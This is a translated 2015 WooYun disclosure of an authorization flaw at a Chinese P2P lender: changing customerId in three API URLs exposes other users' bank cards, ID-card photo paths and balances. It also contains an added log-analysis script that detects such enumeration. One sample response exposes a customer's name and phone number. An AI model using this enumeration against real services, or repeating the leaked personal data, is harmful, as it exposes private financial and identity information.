
Vulnerability summary

Defect ID: wooyun-2015-0126268

Title: P2P finance security: a vulnerability at 意真金融 (Yizhen Finance) can leak large amounts of user information (bank card numbers / phone numbers / ID card photos / balance queries, etc.)

Vendor: 意真(上海)金融信息服务有限公司 (Yizhen (Shanghai) Financial Information Services Co., Ltd.)

Author: Jinone

Submitted: 2015-07-13 10:54

Fixed: 2015-07-18 10:56

Disclosed: 2015-07-18 10:56

Type: Network design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-13: Details sent to the vendor, awaiting the vendor's response
2015-07-18: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

Earlier I submitted a password-reset issue and got 4 rank for it.
Now every kind of information is exposed; is cashing out still a problem?
This should be the user's id: 14051005
#1. Bank card number lookup
Enumerate the parameter customerId

[masked] https://**.**.**/esb/account/customer/bankInfo/list?customerId=14051005&

[screenshot: 1.jpg]


#2. ID card photo enumeration
Look here: the image naming rule is hard to enumerate directly

[masked] http://**.**.**/upload/attachment5/14051005/00150001/1432363081128.jpg


But simply by enumerating the user id we can see the image information. I used Burp Suite to extract it:

[masked] https://**.**.**/esb/account/customer/cardInfo/audit?customerId=14051005&


The response looks like this:

{
"success" : true,
"message" : "",
"attr" : {
"customerInfo" : {
"name" : null,
"cardId" : null,
"foreUrl" : "",
"foreThumbUrl" : "",
"backUrl" : "",
"backThumbUrl" : "",
"handUrl" : "",
"handThumbUrl" : "",
"status" : ""
},
"cardList" : [ {
"id" : 14098725,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150001",
[masked] *****0/upload/attachment5/1405100*****
"subFilePath" : null,

[masked] *****00/upload/attachment5/14051*****
"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
}, {
"id" : 14098726,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150002",
[masked] *****0/upload/attachment5/1405100*****
"subFilePath" : null,

[masked] *****00/upload/attachment5/14051*****
"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
}, {
"id" : 14098727,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150003",
"storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",
"subFilePath" : null,
[masked] *****00/upload/attachment5/14051*****
"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
} ]
}
}


[screenshot: 2.jpg]

[screenshot: 3.jpg]

[masked] http://**.**.**/upload/attachment5/14033105/00150001/1432291395569.jpg


#3. Then the balance query

[masked] https://**.**.**/esb/fortune/customer/accountinfo?customerId=14087605&

# You can see 2800 here

{
"success" : true,
"message" : "",
"attr" : {
"customerAccVo" : {
"customerId" : "14087605",
"mobile" : "13372530130",
"cnName" : "曹金富",
"recomCode" : "w5dhx2",
"status" : "0",
"avlBal" : 0.0,
"credAmount" : 2800.0,
"currPay" : 0.0,
"fortuneAmount" : 0.0,
"currProfit" : 0.0,
"redNum" : 0,
"recomProfits" : 0.0,
"withdrawStatus" : "0",
"myRecomPerson" : null,
"allNotRepayAmt" : 0.0
},
"surplusLuckNum" : 0,
"unReadMsgCount" : 1
}
}
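All three endpoints above share one defect: the server takes customerId from the query string and never checks it against the logged-in user, so a single session can walk consecutive IDs. The following detection script is an added example, not code from the report or the vendor; it scans constructed access-log lines (the log layout, session-token field and sample values are assumptions) and flags sessions that request customer-scoped ESB resources for several distinct customerIds, which a legitimate session never does.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Endpoints from the report that take the target customer from a query parameter.
CUSTOMER_SCOPED = {
    "/esb/account/customer/bankInfo/list",
    "/esb/account/customer/cardInfo/audit",
    "/esb/fortune/customer/accountinfo",
}

# Assumed (constructed) log layout: client IP, session token, request line, status.
LINE_RE = re.compile(r'^(\S+) (?P<session>\S+) "GET (?P<target>\S+) HTTP/1\.[01]" (\d{3})$')

def parse_line(line):
    """Return (session, path, customerId) for a customer-scoped request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path not in CUSTOMER_SCOPED:
        return None
    ids = parse_qs(url.query).get("customerId", [])
    if not ids or not ids[0].isdigit():
        return None
    return m["session"], url.path, int(ids[0])

def find_enumeration(lines, threshold=3):
    """Sessions that touched >= threshold distinct customerIds, mapped to the sorted IDs.
    A legitimate session only asks for its own ID; one session spanning several is the signal."""
    per_session = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_session[rec[0]].add(rec[2])
    return {s: sorted(i) for s, i in per_session.items() if len(i) >= threshold}

# Constructed sample traffic: sess_a walks consecutive IDs, sess_b stays on its own.
SAMPLE_LOG = [
    '203.0.113.5 sess_a "GET /esb/account/customer/bankInfo/list?customerId=14051005& HTTP/1.1" 200',
    '203.0.113.5 sess_a "GET /esb/account/customer/bankInfo/list?customerId=14051006& HTTP/1.1" 200',
    '203.0.113.5 sess_a "GET /esb/account/customer/cardInfo/audit?customerId=14051007& HTTP/1.1" 200',
    '203.0.113.5 sess_a "GET /esb/fortune/customer/accountinfo?customerId=14051008& HTTP/1.1" 200',
    '198.51.100.9 sess_b "GET /esb/fortune/customer/accountinfo?customerId=14087605& HTTP/1.1" 200',
    '198.51.100.9 sess_b "GET /static/logo.png HTTP/1.1" 200',
]

if __name__ == "__main__":
    for session, ids in find_enumeration(SAMPLE_LOG).items():
        print(f"{session}: {len(ids)} customerIds {ids[0]}..{ids[-1]}")
```

The real fix is server-side: derive the customer from the authenticated session and reject or ignore any client-supplied customerId, so the log check only remains as a safety net.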


Fix recommendation:

Please fix this as soon as possible, before criminals take advantage of it.

Copyright notice: please credit the source when reposting: Jinone@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: No impact (vendor ignored)

Ignored at: 2015-07-18 10:56

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

2015-09-10: Many thanks, the vulnerability has been handled